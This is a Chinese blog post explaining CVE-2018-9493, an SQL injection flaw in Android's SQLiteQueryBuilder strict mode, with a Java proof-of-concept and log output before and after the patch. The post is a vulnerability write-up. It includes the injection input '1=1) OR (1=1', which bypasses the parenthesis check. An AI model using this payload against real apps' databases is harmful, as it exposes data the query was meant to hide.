码迷,mamicode.com
首页 > 数据库 > 详细

SQLiteQueryBuilder 与 CVE-2018-9493

时间:2019-01-07 22:40:04      阅读:237      评论:0      收藏:0      [点我收藏+]

标签:dem   android   str   fill   build   工作   输出   csr   语法   

安全隐患(SQL注入导致数据泄露):http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9493

 

SQLiteQueryBuilder是Android中用来构建复杂查询SQL的类,在开启安全检查(android.database.sqlite.SQLiteQueryBuilder.setStrict())后会对SQL的Where条件添加额外的“()”以防止恶意SQL注入。

其工作的思路很简单,用加了额外“()”的SQL来编译(prepare()),如果编译顺利(没有语法错),就接着编译、执行原始SQL以获取数据结果。

但是这个思路有个缺陷,如果攻击者有机会恶意拼接Where条件,用类似“1=1) OR (1=1”这样的输入,因为输入中也包含了“()”,可以让开启setStrict后的两种SQL均编译顺利通过,但是Where条件的含义却被篡改了。

 

验证程序:

    private void testQueryBuilder() {
        Log.i(TAG,"Begin testQueryBuilder...");
        android.database.sqlite.SQLiteDatabase         adb = android.database.sqlite.SQLiteDatabase.openOrCreateDatabase("/data/data/just.justdbdemo/t.db", null);
        android.database.sqlite.SQLiteQueryBuilder     sqb = new android.database.sqlite.SQLiteQueryBuilder();
        sqb.setTables("sqlite_master");
        sqb.setStrict(true);
        sqb.appendWhere("sql !=‘sql‘");
        Cursor csr = sqb.query(adb, new String[]{"name, sql"}, "1=1) OR (1=1", null, null, null, null);
        Log.i(TAG, "csr.getCount() = " + csr.getCount());
        csr.close();
        adb.close();
        Log.i(TAG,"End of testQueryBuilder...");
    }

输出结果:

android.database.sqlite.SQLiteQueryBuilder.setStrict(false);

01-07 13:25:25.465: D/SQLiteConnection(1149): prepare took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !=sql) AND (1=1) OR (1=1)"
01-07 13:25:25.475: D/SQLiteConnection(1149): executeForCursorWindow took 2ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !=sql) AND (1=1) OR (1=1)", window=/data/data/just.justdbdemo/t.db {2a150a58}, startPos=0, actualPos=0, filledRows=1, countedRows=1
01-07 13:25:25.475: I/Just DB test(1149): csr.getCount() = 1

----------------------------------------------------------------------------------------------------- android.
database.sqlite.SQLiteQueryBuilder.setStrict(true); 01-07 13:27:06.645: D/SQLiteConnection(1199): prepare took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !=sql) AND ((1=1) OR (1=1))" 01-07 13:27:06.645: D/SQLiteConnection(1199): prepare took 3ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !=sql) AND (1=1) OR (1=1)" 01-07 13:27:06.655: D/SQLiteConnection(1199): executeForCursorWindow took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !=sql) AND (1=1) OR (1=1)", window=/data/data/just.justdbdemo/t.db {2a147798}, startPos=0, actualPos=0, filledRows=1, countedRows=1 01-07 13:27:06.655: I/Just DB test(1199): csr.getCount() = 1 打上补丁之后 01-07 13:28:30.135: D/SQLiteConnection(1199): prepare took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !=sql) AND ((1=1) OR (1=1))" 01-07 13:28:30.165: D/SQLiteConnection(1199): prepare took 2ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !=sql) AND (1=1) OR (1=1)" 01-07 13:28:30.195: D/SQLiteConnection(1199): executeForCursorWindow took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !=sql) AND ((1=1) OR (1=1))", window=/data/data/just.justdbdemo/t.db {2a155a58}, startPos=0, actualPos=0, filledRows=0, countedRows=0 01-07 13:28:30.195: I/Just DB test(1199): csr.getCount() = 0

 

SQLiteQueryBuilder 与 CVE-2018-9493

标签:dem   android   str   fill   build   工作   输出   csr   语法   

原文地址:https://www.cnblogs.com/zhhd/p/10235892.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!